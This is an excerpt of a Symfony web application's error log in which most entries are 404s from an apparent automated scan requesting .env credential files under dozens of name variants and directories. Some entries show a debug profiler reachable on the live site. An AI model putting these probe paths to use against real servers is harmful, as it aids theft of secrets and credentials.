  8204. [2025-12-20 20:45:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.old"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.old\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8205. [2025-12-20 20:45:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.prod"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.prod\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8206. [2025-12-20 20:45:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.prod.local"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.prod.local\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8207. [2025-12-20 20:45:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.production"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.production\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8208. [2025-12-20 20:45:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.production.local"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.production.local\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8209. [2025-12-20 20:45:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.project"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.project\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8210. [2025-12-20 20:45:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.qa"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.qa\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8211. [2025-12-20 20:45:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.sample"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.sample\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8212. [2025-12-20 20:45:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.save"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.save\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8213. [2025-12-20 20:45:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.stage"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.stage\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8214. [2025-12-20 20:45:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.staging"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.staging\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8215. [2025-12-20 20:45:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.travis"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.travis\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8216. [2025-12-20 20:45:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.uat"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.uat\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8217. [2025-12-20 20:45:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7102de","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7102de","method":"GET"} []
  8218. [2025-12-20 20:45:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  8219. [2025-12-20 20:46:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env.webpack"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env.webpack\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8220. [2025-12-20 20:46:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env_1"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env_1\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8221. [2025-12-20 20:46:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.envrc"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.envrc\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8222. [2025-12-20 20:46:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.envs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.envs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8223. [2025-12-20 20:46:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env~"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env~\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8224. [2025-12-20 20:46:41] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?pp=enable&pp=env","method":"GET"} []
  8225. [2025-12-20 20:46:59] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?pp=env&pp=env","method":"GET"} []
  8226. [2025-12-20 20:47:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ADMIN/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ADMIN/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8227. [2025-12-20 20:47:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /API/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /API/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8228. [2025-12-20 20:47:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /APP/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /APP/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8229. [2025-12-20 20:47:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /Api/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /Api/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8230. [2025-12-20 20:47:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /BACK/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /BACK/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8231. [2025-12-20 20:47:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /BACKEND/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /BACKEND/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8232. [2025-12-20 20:47:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /BE/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /BE/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8233. [2025-12-20 20:47:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /Backend/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /Backend/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8234. [2025-12-20 20:47:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /Be/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /Be/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8235. [2025-12-20 20:47:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /admin-app/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /admin-app/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8236. [2025-12-20 20:47:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /admin/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /admin/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8237. [2025-12-20 20:48:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /admin/backend/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /admin/backend/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8238. [2025-12-20 20:48:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /administrator/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /administrator/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8239. [2025-12-20 20:48:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api-backend/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api-backend/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8240. [2025-12-20 20:48:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api-node/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api-node/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8241. [2025-12-20 20:48:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8242. [2025-12-20 20:48:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api2/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api2/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8243. [2025-12-20 20:48:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api3/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api3/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8244. [2025-12-20 20:48:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /apis/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /apis/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8245. [2025-12-20 20:49:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8246. [2025-12-20 20:49:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/api/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/api/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8247. [2025-12-20 20:49:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /apps/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /apps/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8248. [2025-12-20 20:49:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /back-end/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /back-end/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8249. [2025-12-20 20:49:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /back/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /back/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
